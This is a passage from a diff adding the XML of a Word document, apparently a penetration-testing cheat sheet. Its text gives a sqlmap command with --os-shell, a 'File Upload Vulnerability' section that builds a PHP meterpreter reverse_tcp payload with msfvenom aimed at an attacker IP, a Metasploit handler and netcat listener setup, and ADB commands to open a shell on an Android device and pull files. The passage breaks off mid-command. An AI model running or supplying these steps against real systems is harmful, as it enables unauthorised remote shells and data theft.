+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="20"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="20"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>sqlmap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -u </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="0A3069"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="0A3069"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>http:domain.com/path.aspx</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="0A3069"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>?id=1"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> --cookie</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=”PHPSESSID</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=1tmgthfok042dslt7lr7nbv4cb</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="CF222E"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> security=low” --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>os</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>-shell</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="20"/>
+        </w:numPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:eastAsia="en-IN"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="360" w:after="240"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="1F2328"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+        <w:t>File Upload Vulnerability</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>msfvenom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -p </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>meterpreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>reverse_tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> LHOST=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:color w:val="CF222E"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>attacker-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:color w:val="CF222E"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> LPORT=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:color w:val="CF222E"/>
+        </w:rPr>
+        <w:t>&lt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>attacker-port</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:color w:val="CF222E"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -f raw </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:color w:val="CF222E"/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>file.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>msfdb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>init</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-k"/>
+          <w:color w:val="CF222E"/>
+        </w:rPr>
+        <w:t>&amp;&amp;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>msfconsole</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>use multi/handler</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c1"/>
+          <w:color w:val="0550AE"/>
+        </w:rPr>
+        <w:t>set</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> payload </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>meterepreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>reverse_tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c1"/>
+          <w:color w:val="0550AE"/>
+        </w:rPr>
+        <w:t>set</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> LHOST=attacker-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c1"/>
+          <w:color w:val="0550AE"/>
+        </w:rPr>
+        <w:t>set</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> LPORT= </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>attcker</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>-port</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+        <w:t>run</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:rPr>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c"/>
+          <w:color w:val="59636E"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># If </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c"/>
+          <w:color w:val="59636E"/>
+        </w:rPr>
+        <w:t>incase</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c"/>
+          <w:color w:val="59636E"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c"/>
+          <w:color w:val="59636E"/>
+        </w:rPr>
+        <w:t>metaspolit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c"/>
+          <w:color w:val="59636E"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> not working use </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c"/>
+          <w:color w:val="59636E"/>
+        </w:rPr>
+        <w:t>NetCat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c"/>
+          <w:color w:val="59636E"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and shell code below</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="NormalWeb"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="59636E"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink r:id="rId7" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+            <w:color w:val="0969DA"/>
+          </w:rPr>
+          <w:t>Reverse Shell Cheat Sheet</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="59636E"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> : Use the code, change IP &amp; Port and use it with </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="59636E"/>
+        </w:rPr>
+        <w:t>NetCat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
+          <w:color w:val="59636E"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> listener</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="HTMLPreformatted"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F6F8FA"/>
+        <w:rPr>
+          <w:rFonts w:cs="Courier New"/>
+          <w:color w:val="1F2328"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c1"/>
+          <w:color w:val="0550AE"/>
+        </w:rPr>
+        <w:t>nc</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c1"/>
+          <w:color w:val="0550AE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c1"/>
+          <w:color w:val="0550AE"/>
+        </w:rPr>
+        <w:t>vnl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="pl-c1"/>
+          <w:color w:val="0550AE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -p 1234</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t># Connection Establish Steps</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>adb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> connect 192.168.0.4:5555</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>adb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> devices -l</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>adb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> shell  </w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t># Download a File from Android using ADB tool</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>adb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> pull /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sdcard</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">/log.txt C:\Users\admin\Desktop\log.txt </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>adb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> pull </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>sdcard</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>/log.txt /home/</w:t>
